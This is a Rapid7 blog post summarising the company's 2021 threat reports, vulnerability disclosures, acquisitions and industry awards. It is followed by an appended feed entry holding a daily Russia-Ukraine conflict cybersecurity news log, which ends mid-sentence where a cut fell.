
Now that 2022 is fully underway, it's time to wrap up some of the milestones that Rapid7 achieved in 2021. We worked harder than ever last year to help protectors keep their organization's infrastructure secure — even in the face of [some of the most difficult threats](<https://www.rapid7.com/log4j-cve-2021-44228-customer-resources/>) the security community has dealt with in recent memory. Here's a rundown of some of our biggest moments in that effort from 2021.
## Emergent threats and vulnerability disclosures
As always, our Research and Emergent Threat Response teams spent countless hours in 2021 bringing you need-to-know information about the most impactful late-breaking security exploits and vulnerabilities. Let's revisit some of the highlights.
### Emergent threat reports
* [Widespread Exploitation of Critical Remote Code Execution in Apache Log4j](<https://www.rapid7.com/blog/post/2021/12/10/widespread-exploitation-of-critical-remote-code-execution-in-apache-log4j/>)
* [CVE-2021-34527 (PrintNightmare): What You Need to Know](<https://www.rapid7.com/blog/post/2021/06/30/cve-2021-1675-printnightmare-patch-does-not-remediate-vulnerability/>)
* [GitLab Unauthenticated Remote Code Execution CVE-2021-22205 Exploited in the Wild](<https://www.rapid7.com/blog/post/2021/11/01/gitlab-unauthenticated-remote-code-execution-cve-2021-22205-exploited-in-the-wild/>)
* [Critical vCenter Server File Upload Vulnerability (CVE-2021-22005)](<https://www.rapid7.com/blog/post/2021/09/21/critical-vcenter-server-file-upload-vulnerability-cve-2021-22005/>)
* [Microsoft SAM File Readability CVE-2021-36934: What You Need to Know](<https://www.rapid7.com/blog/post/2021/07/21/microsoft-sam-file-readability-cve-2021-36934-what-you-need-to-know/>)
* [ProxyShell: More Widespread Exploitation of Microsoft Exchange Servers](<https://www.rapid7.com/blog/post/2021/08/12/proxyshell-more-widespread-exploitation-of-microsoft-exchange-servers/>)
### Vulnerability disclosures
* [CVE-2021-3546[78]: Akkadian Console Server Vulnerabilities (FIXED)](<https://www.rapid7.com/blog/post/2021/09/07/cve-2021-3546-78-akkadian-console-server-vulnerabilities-fixed/>)
* [Fortinet FortiWeb OS Command Injection](<https://www.rapid7.com/blog/post/2021/08/17/fortinet-fortiweb-os-command-injection/>)
* [CVE-2020-7387..7390: Multiple Sage X3 Vulnerabilities](<https://www.rapid7.com/blog/post/2021/07/07/cve-2020-7387-7390-multiple-sage-x3-vulnerabilities/>)
## Research and policy highlights
That's not all our Research team was up to in 2021. They also churned out a wealth of content and resources weighing in on issues of industry-wide, national, and international importance.
* We published several reports on the state of cybersecurity, including:
  * Our [2020 Vulnerability Intelligence Report](<https://www.rapid7.com/blog/post/2021/03/11/introducing-the-vulnerability-intelligence-report-50-cves-that-made-headlines-in-2020/>)
  * Our latest [Industry Cyber-Exposure Report (ICER)](<https://www.rapid7.com/blog/post/2021/05/05/rapid7-releases-new-industry-cyber-exposure-report-icer-asx-200/>)
  * Our [2021 Cloud Misconfigurations Report](<https://www.rapid7.com/info/2021-cloud-misconfigurations-research-report/>)
* We tackled the [hot-button topic of hack back](<https://www.rapid7.com/blog/post/2021/08/10/hack-back-is-still-wack/>) and discussed whether or not the practice is, in fact, wack. (Spoiler: It is.)
* We unpacked the implications for [cybersecurity in the US Infrastructure Bill](<https://www.rapid7.com/blog/post/2021/08/31/cybersecurity-in-the-infrastructure-bill/>).
* We highlighted the reasons why we think the [UK's Computer Misuse Act](<https://www.rapid7.com/blog/post/2021/08/12/reforming-the-uks-computer-misuse-act/>) needs some revising.
* We launched [Project Doppler](<https://www.rapid7.com/research/project-doppler/>), a free tool for Rapid7 customers, developed by our Research team to help organizations get better insight into their public internet exposure.
## The Rapid7 family keeps growing
Throughout 2021, we made some strategic acquisitions to broaden the solutions we offer and help make the [Insight Platform](<https://www.rapid7.com/products/insight-platform/>) the one-stop shop for your security program.
* [We acquired IntSights](<https://www.rapid7.com/blog/post/2021/07/19/rapid7-acquires-intsights/>) to help organizations obtain holistic threat intelligence.
* [We teamed up with open-source platform Velociraptor](<https://www.rapid7.com/blog/post/2021/04/21/rapid7-and-velociraptor-join-forces/>) to provide teams with better endpoint visibility.
* [We brought Kubernetes security provider Alcide](<https://www.rapid7.com/blog/post/2021/02/01/rapid7-acquires-leading-kubernetes-security-provider-alcide/>) under the Rapid7 umbrella to add more robust cloud security capabilities to InsightCloudSec.
## Industry accolades
We're always thrilled to get industry recognition for the work we do helping protectors secure their organizations — and we had a few big nods to celebrate in 2021.
* Gartner once again [named us a Leader](<https://www.rapid7.com/blog/post/2021/08/23/rapid7-mdr-named-a-market-leader-again/>) in its Magic Quadrant for Managed Detection and Response (MDR).
* We also earned recognition as a Strong Performer in the [inaugural Forrester Wave for MDR](<https://www.rapid7.com/blog/post/2021/03/24/rapid7-recognized-as-a-strong-performer-in-the-inaugural-forrester-wave-for-mdr-q1-2021/>).
* Gartner recognized InsightIDR as a [Leader in its Magic Quadrant for SIEM](<https://www.rapid7.com/blog/post/2021/07/06/once-again-rapid7-named-a-leader-in-2021-gartner-magic-quadrant-for-siem/>) for the second time in a row.
* In its 2021 Magic Quadrant for Application Security Testing (AST), Gartner [named us a Visionary](<https://www.rapid7.com/blog/post/2021/06/01/rapid7-named-a-visionary-in-2021-gartner-magic-quadrant-for-application-security-testing/>).
## Keeping in touch
Clearly, we had a pretty busy 2021 — and we have even more planned for 2022. If you need the latest and greatest in security content to tide you over throughout the last few weeks of the year, we have a few ideas for you.
* Listen to the [latest season of Security Nation](<https://www.rapid7.com/blog/series/security-nation/security-nation-season-4/>), our podcast where we chat with amazing guests from all corners of the security community. Season 5 launches later this month!
* Put the finishing touches on your cybersecurity program for the coming year with insights from our [2022 Planning series](<https://www.rapid7.com/blog/tag/2022-planning/>).
* Get better acquainted with the latest application security threats with our series on the [OWASP Top 10 for 2021](<https://www.rapid7.com/blog/tag/owasp-top-10-2021/>).
* Read up on why [InsightIDR was XDR before it was cool to be XDR](<https://www.rapid7.com/blog/post/2021/11/09/insightidr-was-xdr-before-xdr-was-even-a-thing-an-origin-story/>).
Stay tuned for more great content, research, and much more in 2022!
{"rapid7blog": [{"lastseen": "2022-03-16T21:28:40", "description": "\n\nCyberattacks are a distinct concern in the [Russia-Ukraine conflict](<https://www.rapid7.com/blog/tag/russia-ukraine-conflict/>), with the potential to impact individuals and organizations far beyond the physical frontlines. With events unfolding rapidly, we want to provide a single channel by which we can communicate to the security community the major cyber-related developments from the conflict each day.\n\nEach business day, we will update this blog at 5 pm EST with what we believe are the need-to-know updates in cybersecurity and threat intelligence relating to the Russia-Ukraine conflict. We hope this blog will make it easier for you to stay current with these events during an uncertain and quickly changing time.\n\n* * *\n\n## March 16, 2022\n\nUkrainian President Volodymyr Zelenskyy [delivered a virtual speech](<https://www.nbcnews.com/politics/congress/zelenskyy-expected-press-us-military-support-address-congress-rcna20088>) to US lawmakers on Wednesday, asking again specifically for a no-fly zone over Ukraine and for additional support. \n\nThe White House released a new [fact sheet](<https://www.whitehouse.gov/briefing-room/statements-releases/2022/03/16/fact-sheet-on-u-s-security-assistance-for-ukraine/>) detailing an additional $800 million in security assistance to Ukraine. \n\n**Threat Intelligence Update**\n\n * ******UAC-0056 targets Ukrainian entities******\n\nSentinelOne researchers reported that UAC-0056 targeted Ukrainian entities using a malicious Python-based package, masquerading as a Ukrainian language translation software. 
Once installed, the fake app deployed various malware, such as Cobalt Strike, GrimPlant, and GraphSteel.\n\n_Source: [Sentinel One](<https://www.sentinelone.com/blog/threat-actor-uac-0056-targeting-ukraine-with-fake-translation-software/>)_\n\n * ******A ****h****acker was caught routing calls to Russian troops******\n\nThe Security Service of Ukraine claimed to have arrested a hacker that helped deliver communications from within Russia to the Russian troops operating in the Ukrainian territory. The hacker also sent text messages to\n\nUkrainian security officers and civil servants, exhorting them to surrender.\n\n_Source: [The Verge](<https://www.theverge.com/2022/3/15/22979381/phone-relay-capture-russia-military-unencrypted-communications-ukraine>)_\n\n## March 15, 2022\n\nThe Ukrainian Ministry of Defense [leaked documents](<https://www.scmagazine.com/analysis/breach/in-a-first-ukraine-leaks-russian-intellectual-property-as-act-of-war>) of a Russian nuclear power plant. This may be the first-ever instance of a hack-and-leak operation to weaponize the disclosure of intellectual property to harm a nation.\n\nResearchers at INFOdocket, a subsidiary of [Library Journal](<https://en.wikipedia.org/wiki/Library_Journal>), have [created](<https://www.infodocket.com/2022/03/10/briefings-reports-and-updates-about-the-conflict-in-ukraine-from-the-congressional-research-service-european-parliament-research-service-and-uk-house-of-commons-library/>) a compendium of briefings, reports, and updates about the conflict in Ukraine from three research organizations: Congressional Research Service (CRS), European Parliament Research Service (EPRS), and the UK House of Commons Library. 
The resource will be updated as each of the three organizations releases relevant new content.\n\nThe Wall Street Journal [is reporting](<https://www.wsj.com/articles/russian-prosecutors-warn-western-companies-of-arrests-asset-seizures-11647206193>) that Russian prosecutors have issued warnings to Western companies in Russia, threatening to arrest corporate leaders there who criticize the government or to seize assets of companies that withdraw from the country. \n\nRussia may [default on $117 million (USD) in interest payments](<https://qz.com/2142075/sanctions-are-likely-to-force-russia-to-default-on-foreign-debt/>) on dollar-denominated bonds due to Western sanctions, the first foreign debt default by Russia since 1918.\n\nReuters is [reporting](<https://www.usnews.com/news/world/articles/2022-03-14/russian-delegation-suspends-participation-in-council-of-europe-body-ria>) that Russia's delegation to the Parliamentary Assembly of the Council of Europe (PACE) is suspending its participation and will not take part in meetings. \n\nCNN [reports](<https://www.cnn.com/europe/live-news/ukraine-russia-putin-news-03-15-22/h_3f0d63658ac5c2875ed265df00ba8b40>) that Russia has imposed sanctions against US President Joe Biden, his son, Secretary of State Antony Blinken, other US officials, and \u201cindividuals associated with them,\u201d the Russian Foreign Ministry said in a statement on Tuesday.\n\n**Threat Intelligence Update**\n\n * ******Russian ****s****tate-****s****ponsored ****c****yber ****a****ctors ****a****ccess ****n****etwork ****m****isconfigured with ****d****efault MFA ****p****rotocols******\n\nCISA and the Federal Bureau of Investigation (FBI) have released a joint Cybersecurity Advisory that details how Russian state-sponsored cyber actors accessed a network with misconfigured default multifactor authentication (MFA) protocols. 
The actors then exploited a critical Windows Print Spooler vulnerability, [\u201cPrintNightmare\u201d (CVE-2021-34527)](<https://www.rapid7.com/blog/post/2021/06/30/cve-2021-1675-printnightmare-patch-does-not-remediate-vulnerability/>), to run arbitrary code with system privileges.\n\n_Source: [CISA](<https://www.cisa.gov/uscert/ncas/current-activity/2022/03/15/russian-state-sponsored-cyber-actors-access-network-misconfigured>)_\n\n * ******Fake antivirus updates used to deploy Cobalt Strike in Ukraine******\n\nUkraine's Computer Emergency Response Team is warning that threat actors are distributing fake Windows antivirus updates that install Cobalt Strike and other malware. The phishing emails impersonate Ukrainian government agencies offering ways to increase network security and advise recipients to download \"critical security updates,\" which come in the form of a 60 MB file named \"BitdefenderWindowsUpdatePackage.exe.\"\n\n_Source: [BleepingComputer/CERT-UA](<https://www.bleepingcomputer.com/news/security/fake-antivirus-updates-used-to-deploy-cobalt-strike-in-ukraine/amp/>)_\n\n * ******A ****n****ovel ****w****iper ****t****argets Ukrainian ****e****ntities******\n\nCybersecurity researchers observed the new CaddyWiper malware targeting Ukrainian organizations. Once deployed, CaddyWiper destroys and overwrites the data from any drives that are attached to the compromised system. 
Despite being released in close proximity to other wiping malware targeting Ukraine, such as HermeticWiper and IsaacWiper, CaddyWiper does not share any significant code similarities with them and appears to be created separately.\n\n_Source:[ Bleeping Computer](<https://www.bleepingcomputer.com/news/security/new-caddywiper-data-wiping-malware-hits-ukrainian-networks/amp/>)_\n\n * ******German Federal Office for Information Security ****a****gency ****i****ssues an ****a****lert for Russian ****a****ntivirus ****s****oftware Kaspersky******\n\nThe German Federal Office for Information Security agency (BSI) issued an alert urging its citizens to replace Kaspersky antivirus software with another defense solution, due to alleged ties to the Kremlin. The agency suggested Kaspersky could be used as a tool in the cyber conflict between Russia and Ukraine.\n\n_Source:[ BSI](<https://www.bsi.bund.de/DE/Service-Navi/Presse/Pressemitteilungen/Presse2022/220315_Kaspersky-Warnung.html>)_\n\n## March 14, 2022\n\nThe EU-based NEXTA media group has [reported](<https://twitter.com/nexta_tv/status/1503393046351781892?s=20&t=1tA7lZrLVe-cZpHb9wy2LA>) that Russia is starting to block VPN services.\n\nBermuda\u2019s aviation regulator [said](<https://financialpost.com/pmn/business-pmn/bermuda-revokes-licenses-for-russian-operated-planes-over-safety-concerns>) it is suspending certification of all Russian-operated airplanes registered in the British overseas territory due to international sanctions over the war in Ukraine, in a move expected to affect more than 700 planes.\n\nThe Washington Post [reported](<https://www.washingtonpost.com/world/2022/03/12/russia-putin-google-apple-navalny/>) that Federal Security Service (FSB), Russian Federalnaya Sluzhba Bezopasnosti, agents approached Google and Apple executives with requests to remove apps created by activist groups.\n\nAmnesty International 
[said](<https://www.amnesty.org/en/latest/news/2022/03/russia-authorities-block-amnesty-internationals-russian-language-website/>) Russian authorities have blocked their Russian-language website. \n\n**Threat Intelligence Update**\n\n * ******Anonymous claims to hack Rosneft, German subsidiary of Russian energy******\n\nAnonymous claimed to hack the German branch of the Russian energy giant Rosneft, allegedly stealing 20 TB of data. The company systems were significantly affected by the attack, although there currently seems to be no effect on the company's energy supply.\n\n_Source:[ Security Affairs](<https://securityaffairs.co/wordpress/129052/hacktivism/anonymous-hacked-german-subsidiary-rosneft.html>)_\n\n * ******Russia blocks access to Instagram nationwide******\n\nRussia's Internet moderator Roskomnadzor decided to block Instagram access in the country, following Meta's decision to allow \"calls for violence against Russian citizens.\" The federal agency gave Instagram users 48 hours to prepare and finally completed the act on March 13. 
The blocking of Instagram follows the former ban of Facebook and Twitter in Russia last week.\n\n_Source:[ Cyber News](<https://cybernews.com/cyber-war/instagram-is-no-longer-accessible-in-russia/?utm_source=youtube&utm_medium=cn&utm_campaign=news_CNN_047_instagram_blocked_in_russia&utm_term=2v1_yubOBMc&utm_content=direct_article>)_\n\n## March 11, 2022\n\nPresident Biden, along with the European Union and the Group of Seven Countries, [moved](<https://www.whitehouse.gov/briefing-room/statements-releases/2022/03/11/fact-sheet-united-states-european-union-and-g7-to-announce-further-economic-costs-on-russia/>) to revoke \u201cmost favored nation\u201d trade status for Russia, deny borrowing privileges at multilateral financial institutions, apply sanctions to additional Russian elites, ban export of luxury goods to Russia, and ban US import of goods from several signature sectors of Russia\u2019s economy.\n\n**Threat Intelligence Update**\n\n * **Amid difficulties with renewing certificates, Russia has created its own trusted TLS certificate authority**\n\nSigning authorities based in countries that have imposed sanctions on Russia can no longer accept payments for their services, leaving many sites with no practical means to renew expiring certificates. As a result, the Russian Ministry of Digital Development announced the availability of domestic certificates, replacing expired or revoked foreign certificates.\n\n_Source: [Bleeping Computer](<https://www.bleepingcomputer.com/news/security/russia-creates-its-own-tls-certificate-authority-to-bypass-sanctions/>)_\n\n * ******Triolan, ****a**** major Ukrainian internet service provider****,**** was hacked \u2014 twice******\n\nTriolan, a Ukraine-based ISP with more than half a million subscribers, was reportedly hacked initially on February 24th, with a second attack hitting on March 9th. 
The company reported that the threat actors managed to hack into key components of the network, some of which couldn\u2019t be recovered.\n\n_Source: [Forbes](<https://www.forbes.com/sites/thomasbrewster/2022/03/10/cyberattack-on-major-ukraine-internet-provider-causes-major-outages/?sh=768d17596573>)_\n\n## March 10, 2022\n\nBy [order of President Putin](<https://twitter.com/KevinRothrock/status/1501935395092631556?s=20&t=TvFRrQvNfQ6OL3qvFJePQg>), Russia\u2019s Economic Development Ministry has drafted a bill that would effectively nationalize assets and businesses \"abandoned\" in Russia by foreign corporations. Management of these seized assets will be entrusted to the VEB.RF state development corporation and to Russia\u2019s Deposit Insurance Agency.\n\nRussia has [effectively legalized patent theft](<http://publication.pravo.gov.ru/Document/View/0001202203070005?index=0&rangeSize=1>) from anyone affiliated with countries \u201cunfriendly\u201d to it, declaring that unauthorized use will not be compensated. 
The Russian news agency Tass has [further reporting](<https://tass.ru/ekonomika/13982403>) on this, as does the [Washington Post](<https://www.washingtonpost.com/business/2022/03/09/russia-allows-patent-theft/>).\n\nGoldman Sachs Group Inc [announced it was closing its operations in Russia](<https://www.reuters.com/business/finance/goldman-sachs-exit-russia-bloomberg-news-2022-03-10/>), becoming the first major Wall Street bank to exit the country following Moscow's invasion of Ukraine.\n\nUK Foreign Secretary Liz Truss [announced](<https://www.gov.uk/government/news/abramovich-and-deripaska-among-seven-oligarchs-targeted-in-estimated-15bn-sanction-hit>) a full asset freeze and travel ban on seven of Russia\u2019s wealthiest and most influential oligarchs, whose business empires, wealth, and connections are closely associated with the Kremlin.\n\nUS Vice President Kamala Harris [announced](<https://www.whitehouse.gov/briefing-room/statements-releases/2022/03/10/vice-president-kamala-harris-announces-additional-u-s-funding-to-respond-to-humanitarian-needs-in-ukraine-and-eastern-europe/>) nearly $53 million in new humanitarian assistance from the United States government, through the US Agency for International Development (USAID), to support innocent civilians affected by Russia\u2019s invasion of Ukraine.\n\nThe International Atomic Energy Agency (IAEA) [provided an update](<https://www.iaea.org/newscenter/pressreleases/update-17-iaea-director-general-statement-on-situation-in-ukraine>) on the situation at the Chernobyl Nuclear Power Plant. The IAEA Director General said that the Agency is aware of reports that power has now been restored to the site and is looking for confirmation. At the same time, Ukraine informed them that today it had lost all communications with the facility. 
The IAEA has assured the international community that there has been \u201cno impact on essential safety systems.\u201d\n\n**Threat Intelligence Update**\n\n * **New malware variant targeting Russia named RURansom**\n\nRURansom is a malware variant that was recently discovered and appears to be targeting Russia. While it was initially suspected of being a ransomware, further analysis suggests it is actually a wiper. So far, no active non-Russian targets have been identified, likely due to the malware targeting specific entities.\n\n_Source: [TrendMicro](<https://www.trendmicro.com/en_us/research/22/c/new-ruransom-wiper-targets-russia.html>)_\n\n_Available in Threat Library as: RURansom_\n\n * ******Kaspersky source code leak seems to be just a collection of publicly available HTML files******\n\nThe hacking group NB65 claimed on social networks to have leaked source code from the Russian antivirus firm Kaspersky. However, it appears that the leaked files are nothing more than a long list of HTML files and other related, publicly available web resources.\n\n_Source: [Cybernews](<https://cybernews.com/cyber-war/long-awaited-kaspersky-leak-doesnt-seem-to-be-a-leak-at-all/>)_\n\n * ******Anonymous claims to hack Roskomnadzor, a Russian federal agency******\n\nHacktivist group Anonymous claims to have breached Roskomnadzor, a Russian federal agency responsible for monitoring, controlling, and censoring Russian mass media, leaking over 360,000 (817.5 GB) files. Based on the report, the leak contains relatively recent censored documents, dated as late as March 5, and demonstrates Russia\u2019s attempts to censor media related to the conflict in Ukraine.\n\n_Source: @AnonOpsSE via [Twitter](<https://twitter.com/AnonOpsSE/status/1501944150794506256>) _\n\n## March 9, 2022\n\n**Public policy:** Citing concerns over rising cybersecurity risks related to the Russia-Ukraine conflict, the US is poised to enact new cyber incident reporting requirements. 
The_ _[Cyber Incident Reporting for Critical Infrastructure Act of 2022](<https://www.congress.gov/bill/117th-congress/senate-bill/3600/text?q=%7B%22search%22%3A%5B%22s+3600%22%2C%22s%22%2C%223600%22%5D%7D&r=3&s=2>):\n\n * Will require critical-infrastructure owners and operators to report cybersecurity incidents to CISA within 72 hours of determining the incident is significant enough that reporting is required;\n * Will require critical infrastructure owners and operators to report ransomware payments to CISA within 24 hours; and\n * Is intended to give federal agencies more insight into attack trends and potentially provide early warnings of major vulnerabilities or attacks in progress before they spread.\n\nThe Bank of Russia [established](<https://www.cbr.ru/eng/press/event/?id=12744>) temporary procedures for foreign cash transactions, suspending sales of foreign currencies until September 9, 2022. Foreign currency accounts are limited to withdrawals up to $10,000 USD.\n\nThe Financial Crimes Enforcement Network (FinCEN) is [alerting all financial institutions](<https://www.fincen.gov/index.php/news/news-releases/fincen-advises-increased-vigilance-potential-russian-sanctions-evasion-attempts>) to be vigilant against efforts to evade the expansive sanctions and other US-imposed restrictions implemented in connection with the Russian Federation\u2019s further invasion of Ukraine.\n\nThe Pentagon [dismissed](<https://www.cnn.com/2022/03/08/politics/poland-jets-ukraine-russia/index.html>) Poland\u2019s offer to transfer MIG-29 fighter jets to the United States for delivery to Ukraine, stating they did not believe the proposal was \u201ctenable.\u201d\n\n**Threat Intelligence Update**\n\n * ******Multiple hacking groups target Ukrainians and other European ****a****llies via ****p****hishing ****a****ttacks******\n\nSeveral threat actors, including Fancy Bear, Ghostwriter, and Mustang Panda, have launched a large phishing campaign against Ukraine, Poland, and 
other European entities amid Russia's invasion of Ukraine. \n\n_Source: [The Hacker News](<https://thehackernews.com/2022/03/google-russian-hackers-target.html>)_\n\n_Available in Threat Library as: APT28 (Fancy Bear), Ghostwriter, Mustang Panda_\n\n * ******The Conti Ransomware group resumes activity following leaks******\n\nThe Conti Ransomware group appears to have made a comeback following the [leak of its internal chats last week](<https://www.rapid7.com/blog/post/2022/03/01/conti-ransomware-group-internal-chats-leaked-over-russia-ukraine-conflict/>). On March 9, Rapid7 Threat Intelligence observed renewed activity on Conti\u2019s onion site, and CISA released new IOCs related to the group on their Conti alert page.\n\n_Source: [CISA](<https://www.cisa.gov/uscert/ncas/alerts/aa21-265a>)_\n\n_Available in Threat Library as: Conti_\n\n * ******The Belarusian group UNC1151 targets Ukrainian organizations using MicroBackdoor malware******\n\nThe Ukrainian government has reported on a continuous cyberattack on state organizations of Ukraine using malicious software Formbook.\n\n_Source: [Ukrainian CERT](<https://cert.gov.ua/article/37626>)_\n\n_Available in Threat Library as: UNC1151_\n\n## March 8, 2022\n\nThe US [announced](<https://www.whitehouse.gov/briefing-room/presidential-actions/2022/03/08/executive-order-on-use-of-project-labor-agreements-for-federal-construction-projects-2/>) a ban on imports of Russian oil, gas, and other energy products. New US investments in the Russian energy sector are also restricted. The UK [announced](<https://www.gov.uk/government/news/uk-to-phase-out-russian-oil-imports>) it would phase out Russian oil over 2022. \n\nThe International Atomic Energy Agency [published a statement](<https://www.iaea.org/newscenter/pressreleases/update-15-iaea-director-general-statement-on-situation-in-ukraine>) noting that remote data transmission from monitoring systems at Ukraine\u2019s mothballed Chernobyl nuclear power plant has been lost. 
No network data has been observed by internet monitoring companies since March 5, 2022.\n\nChris Chivvis, a senior fellow and director of the American Statecraft Program at the Carnegie Endowment for International Peace, has provided [an assessment](<https://carnegieendowment.org/2022/03/03/how-does-this-end-pub-86570>) of two likely trajectories in the Russia-Ukraine conflict. \n\nTwitter [announced](<https://twitter.com/AlecMuffett/status/1501282223009542151?s=20&t=tO-TNZw5ct6tZUcwyvMl4A>) they have made their social network available on the Tor Project onion service, which will enable greater privacy, integrity, trust, and availability to global users.\n\nThe Minister of Foreign Affairs of the Republic of Poland [announced](<https://www.gov.pl/web/diplomacy/statement-of-the-minister-of-foreign-affairs-of-the-republic-of-poland-in-connection-with-the-statement-by-the-us-secretary-of-state-on-providing-airplanes-to-ukraine>) they are ready to deploy \u2014 immediately and free of charge \u2014 all their MIG-29 jets to the Ramstein Air Force base and place them at the disposal of the US government.\n\nLumen [announced](<https://news.lumen.com/RussiaUkraine>) they are immediately ceasing their limited operations in Russia and will no longer provide services to local Lumen enterprise customers.\n\nMcDonald\u2019s [announced](<https://www.cnbc.com/2022/03/08/mcdonalds-will-temporarily-close-850-restaurants-in-russia-nearly-2-weeks-after-putin-invaded-ukraine.html>) they have temporarily closed 850 restaurants in Russia in response to Russia\u2019s attack on Ukraine.\n\nStarbucks [has announced](<https://www.cnbc.com/2022/03/08/starbucks-suspends-all-business-in-russia-as-putins-forces-attack-ukraine.html>) they will be suspending all business in Russia in response to Russia\u2019s attack on Ukraine.\n\n**Threat Intelligence Update**\n\n * ******52 US organizations were impacted by RagnarLocker ransomware****,**** including critical infrastructures******\n\nThe FBI 
reported that as of January 2021, 52 US-based organizations, some related to critical infrastructure, were affected by RagnarLocker ransomware. The industries affected include manufacturing, energy, financial services, government, and information technology. The malware code excludes execution on post-Soviet Union countries, including Russia, based on a geolocation indicator embedded in its code.\n\n_Source: [FBI FLASH](<https://www.ic3.gov/Media/News/2022/220307.pdf>) _\n\n_Available in Threat Library as: Ragnar Locker_\n\n * ******US energy companies were attacked prior to the Russian invasion to Ukraine******\n\nDuring a two-week blitz in mid-February, hackers received access to dozens of computers belonging to multiple US-based energy companies, including [Chevron Corp.](<https://www.bloomberg.com/quote/CVX:US>), [Cheniere Energy Inc.](<https://www.bloomberg.com/quote/LNG:US>), and [Kinder Morgan Inc](<https://www.bloomberg.com/quote/KMI:US>). The companies were attacked in parallel to the Russian invasion of Ukraine.\n\n_Source: [Bloomberg](<https://www.bloomberg.com/news/articles/2022-03-07/hackers-targeted-u-s-lng-producers-in-run-up-to-war-in-ukraine>)_\n\n * **European officials were hacked by Chinese threat actors amid the conflict in Ukraine**\n\nAccording to Google and Proofpoint, a cyberattack was launched by the Chinese hacking group Mustang Panda and its affiliated group RedDelta, which usually targets Southeast Asian countries. 
The groups managed to gain access to an unidentified European NATO-member email account and spread malware to other diplomatic offices.\n\n_Source: [Forbes](<https://www.forbes.com/sites/thomasbrewster/2022/03/08/chinese-hackers-ramp-up-europe-attacks-in-time-with-russia-ukraine-war/?sh=6077d22f5ee1>)_\n\n_Available in Threat Library as: Mustang Panda_ \n\n\n * ******#OpAmerica: DEVLIX_EU, a pro-Russian hacktivist group, and its affiliates claim to have gained access to terabytes of US sensitive data ******\n\nThe group claims they have obtained access to 92TB of data related to the US Army. According to the group, they also hacked into four of the biggest \u201chosts\u201d in the US and 49 TB of data. As of now, there is no real evidence for the attack provided by the group.\n\n_Source: @Ex_anon_W_hater via [Twitter](<https://twitter.com/Ex_anon_W_hater/status/1500858398664888325>)_\n\n## March 7, 2022\n\nNetflix, KPMG, PwC, and EY have [cut ties with local units in Russia,](<https://www.reuters.com/business/netflix-kpmg-pwc-amex-sever-ties-with-russia-2022-03-06/>) and Danone suspended investments in Russia.\n\nThe Russian government has [published a list of foreign states](<https://www.jpost.com/international/article-700559>) that have committed \u201cunfriendly actions\u201d against \u201cRussia, Russian companies, and citizens.\u201d Countries listed include Australia, Albania, Andorra, the United Kingdom, the member states of the European Union, Iceland, Canada, Liechtenstein, Micronesia, Monaco, New Zealand, Norway, Republic of Korea, San Marino, North Macedonia, Singapore, USA, Taiwan, Ukraine, Montenegro, Switzerland, and Japan.\n\nThe Russian government\u2019s Ministry of Digital [issued orders](<https://www.kommersant.ru/doc/5249500>) for all government websites to use only domestic hosting providers and DNS. 
They further instructed agencies to discontinue using non-Russian third-party tooling, such as Google Analytics.\n\nTikTok is [suspending content from Russia](<https://www.buzzfeednews.com/article/krystieyandoli/tiktok-russia-suspending-media>) in response to the country cracking down on reporting about the invasion of Ukraine.\n\n**Threat Intelligence Update**\n\n * **Anonymous-affiliated threat actor claims to have hacked and shut down water infrastructure in Russia**\n\nThe AnonGhost group claims to have hacked and shut down two Russian SCADA water supply systems, affecting the Russian cities of Volkhov, Boksitogorsk, Luga, Slantsevsky, Tikhvinsky, and Vyborg.\n\n_Source: @darkowlcyber via [Twitter](<https://twitter.com/darkowlcyber/status/1500552186735910915?s=20&t=zXmKgw6Om_VQMHa6XmN6RQ>)_\n\n_Available in Threat Library as: AnonGhost (for Threat Command customers who want to learn more)_\n\n * **Anonymous claims to have hacked Russian TV services to broadcast footage of the war with Ukraine**\n\nAccording to Anonymous, the Russian live TV channels Russia 24, Channel One, and Moscow 24, as well as the Netflix-like streaming services Wink and Ivi, were hacked to broadcast footage of the war with Ukraine.\n\n_Source: @YourAnonNews via [Twitter](<https://twitter.com/YourAnonNews/status/1500613013510008836?s=20&t=qgOO0Uu5T2UrkqdbjEJeAg>)_\n\n## March 4, 2022\n\nThe NATO Cooperative Cyber Defence Center of Excellence (CCDCOE) announced that [Ukraine will join the group](<https://news.yahoo.com/ukraine-join-nato-cyber-defence-171835083.html>) as a \u201ccontributing participant,\u201d indicating that \u201cUkraine could bring valuable first-hand knowledge of several adversaries within the cyber domain to be used for research, exercises, and training.\u201d\n\nThe deputy chief of Ukraine\u2019s information protection service [noted in a Friday briefing](<https://www.bloomberg.com/news/articles/2022-03-04/ukraine-s-hacker-army-said-to-be-helped-by-400-000-supporters>) that over 400,000 
individuals have volunteered to help a crowdsourced Ukrainian government effort to disrupt Russian government and military targets.\n\n**Threat Intelligence Update**\n\n * **Russia blocked access to social media platforms and Western news sites**\n\nRussia has blocked its residents' access to information channels, including Facebook, Twitter, Western news sites such as the BBC, and app stores. In response, the BBC is now providing access to its website via the dark web and has reinstated its shortwave broadcast service.\n\n_Source: [Reuters](<https://www.reuters.com/business/russias-offer-foreign-firms-stay-leave-or-hand-over-keys-2022-03-04/>)_\n\n * **Anonymous-affiliated threat actor hacked and leaked data from the Russian Federal State Budgetary Institution of Science**\n\nThe Russian Federal Guard Service of the Russian Federation was hacked by Anonymous. The hacker published leaked names, usernames, emails, and hashed passwords of people from the institution.\n\n_Source: @PucksReturn via [Twitter](<https://twitter.com/PucksReturn/status/1499757796526542855?s=20&t=LQqanSu2v7L5ONAkpZT1PA>)_\n\n * **Anonymous takes down multiple Russian government websites**\n\nAnonymous claims responsibility for the takedown of a large number of Russian government websites, including one of the main government websites, gov.ru. Most of the websites are still down as of Friday afternoon, March 4.\n\n_Source: @Anonynewsitaly via [Twitter](<https://twitter.com/Anonynewsitaly/status/1499488100405362694?s=20&t=92-u27VSsZLoTAz1KtuOKA>)_\n\n## March 3, 2022\n\n**Additional sanctions:** The US Treasury Dept. [announced another round of sanctions](<https://home.treasury.gov/news/press-releases/jy0628>) on Russian elites, as well as many organizations it characterized as outlets of disinformation and propaganda.\n\n**Public policy:** The Russia-Ukraine conflict is adding momentum to cybersecurity regulatory actions. 
